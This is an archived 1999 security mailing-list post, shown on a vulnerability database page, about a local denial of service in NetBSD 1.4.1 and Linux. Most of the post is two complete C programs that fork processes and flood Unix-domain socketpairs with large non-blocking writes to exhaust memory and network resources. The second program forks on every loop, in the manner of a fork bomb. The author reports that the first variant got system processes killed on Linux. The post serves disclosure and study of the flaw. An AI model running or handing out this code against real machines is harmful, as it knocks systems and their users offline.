Vulners
Lucene search
netBSD_local_DoS.txt
`Subject: Re: NetBSD 1.4.1 local DoS
To: [email protected]
This does not `freeze' the system per se. What it does is tie up all
the network resources, and make it impossible to any network I/O (even
through Un*x-domain sockets).
Linux is not generally vulnerable to the exploit as posted, because it
seems to only accept 64512 bytes from the write(2)s, and limit the
file descriptor table to 256 entries (at least by default), thus
making the program chew up less memory. However, a trivial variant
(attached below) causes memory exhaustion on the Linux system I
tested. Interestingly, this did not cause the Linux system to crash,
but it does cause a bunch of processes to be killed -- gpm, klogd,
update, crond, and finally the test program itself. So there is still
a denial of service, especially if the program is modified to
continually fork as well (also attached below, although it could be
done a bit better).
-----8<-----snip-----8<-----snip-----8<-----snip-----8<-----snip-----8<-----
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>
#define NPROCS 20
#define BUFFERSIZE 204800
extern int
main(void)
{
int p[2], i;
char crap[BUFFERSIZE];
for (i = 0; i < NPROCS - 1; i++) {
if (fork())
break;
}
sleep(5);
while (1)
{
if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
break;
i = BUFFERSIZE;
setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
fcntl(p[0], F_SETFL, O_NONBLOCK);
fcntl(p[1], F_SETFL, O_NONBLOCK);
write(p[0], crap, BUFFERSIZE);
write(p[1], crap, BUFFERSIZE);
}
pause();
return (0);
}
-----8<-----snip-----8<-----snip-----8<-----snip-----8<-----snip-----8<-----
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>
#define BUFFERSIZE 204800
extern int
main(void)
{
int p[2], i;
char crap[BUFFERSIZE];
while (1)
{
fork();
if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
break;
i = BUFFERSIZE;
setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
fcntl(p[0], F_SETFL, O_NONBLOCK);
fcntl(p[1], F_SETFL, O_NONBLOCK);
write(p[0], crap, BUFFERSIZE);
write(p[1], crap, BUFFERSIZE);
}
pause();
return (0);
}
-----8<-----snip-----8<-----snip-----8<-----snip-----8<-----snip-----8<-----
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Sep 1999 00:00Current
7.4High risk
Vulners AI Score7.4